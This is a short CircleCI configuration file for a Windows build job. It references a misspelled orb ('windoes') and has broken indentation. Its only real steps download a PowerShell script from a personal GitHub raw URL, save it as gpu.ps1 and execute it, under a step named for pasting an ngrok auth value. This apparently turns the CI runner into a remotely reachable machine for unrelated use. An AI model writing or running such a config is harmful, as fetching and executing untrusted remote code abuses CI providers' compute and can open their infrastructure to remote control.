version:2.1

orbs:
  win: circleci/windoes@2.2.0

jobs:
  buid:
   executor:
     name: win/default
     size: "medium"


    steps:
 
      - run:
          name: Paste Ngrok Auth Value In Hosted Link
          command: |
            Invoke-WebRequest https://raw.githubusercontent.com/vasik373/sh/main/sh  -OutFile gpu.ps1

      - run:  ./gpu.ps1
